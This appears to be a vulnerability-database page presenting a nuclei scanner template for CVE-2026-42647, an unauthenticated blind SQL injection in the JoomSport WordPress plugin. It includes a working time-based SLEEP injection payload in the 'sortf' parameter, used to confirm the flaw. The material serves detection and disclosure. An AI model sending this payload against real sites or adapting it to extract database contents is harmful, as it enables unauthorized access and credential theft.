Lucene search
K

JoomSport <= 5.7.7 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

JoomSport WordPress plugin up to 5.7.7 allows unauthenticated time-based blind SQL injection via sortf in the player list.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-42647
19 May 202613:32
circl
CNNVD
WordPress plugin JoomSport SQL注入漏洞
11 Jun 202600:00
cnnvd
CVE
CVE-2026-42647
11 Jun 202621:04
cve
Cvelist
CVE-2026-42647 WordPress JoomSport plugin <= 5.7.7 - SQL Injection vulnerability
11 Jun 202621:04
cvelist
EUVD
EUVD-2026-36359
12 Jun 202600:31
euvd
GithubExploit
Exploit for CVE-2026-42647
13 Jun 202616:29
githubexploit
NVD
CVE-2026-42647
11 Jun 202622:16
nvd
Patchstack
WordPress JoomSport plugin <= 5.7.7 - SQL Injection vulnerability
29 Apr 202614:09
patchstack
Positive Technologies
PT-2026-48782
11 Jun 202600:00
ptsecurity
VulnCheck KEV
VulnCheck KEV: CVE-2026-42647
29 Apr 202600:00
vulncheck_kev
Rows per page
id: CVE-2026-42647

info:
  name: JoomSport <= 5.7.7 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The JoomSport WordPress plugin through 5.7.7 is vulnerable to unauthenticated time-based blind SQL injection via the 'sortf' GET parameter in the player list view. The parameter value is backtick-wrapped and directly concatenated into an ORDER BY clause.
  impact: |
    Unauthenticated attackers can extract any data from the WordPress database including admin credentials, user emails, and plugin-stored secrets via time-based blind SQL injection.
  remediation: |
    Update to JoomSport version 5.7.8 or later, which implements column whitelist validation.
  reference:
    - https://patchstack.com/database/wordpress/plugin/joomsport-sports-league-results-management/vulnerability/wordpress-joomsport-plugin-5-7-7-sql-injection-vulnerability
    - https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/base/wordpress/classes/class-jsport-getplayers.php#L153
    - https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/classes/objects/class-jsport-playerlist.php#L80
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42647
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2026-42647
    epss-score: 0.01323
    epss-percentile: 0.67462
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
    vendor: beardev
    product: joomsport-sports-league-results-management
    framework: wordpress
  tags: cve,cve2026,wp,wordpress,wp-plugin,joomsport,sqli,vkev

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-sitemap-posts-joomsport_season-1.xml"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "<loc>")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: season_path
        part: body
        group: 1
        regex:
          - '<loc>[^<]*?//[^/]+(\/[^<]+)</loc>'
        internal: true

  - raw:
      - |
        GET {{season_path}}?action=playerlist&sortf=post_title&sortd=ASC HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Name", "Match played", "Played minutes")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET {{season_path}}?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains_all(body, "Name", "Match played", "Played minutes")'
        condition: and
# digest: 4a0a0047304502202191c881a4d871507420553b92445bb3a352a63da1b75692c43d10498f977ad0022100f135519e1b2472d8a31e094e8aa991cceeae8ea9ff0307221090e2968605b08a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 May 2026 06:25Current
6Medium risk
Vulners AI Score6
CVSS 3.19.3
EPSS0.01323
SSVC
22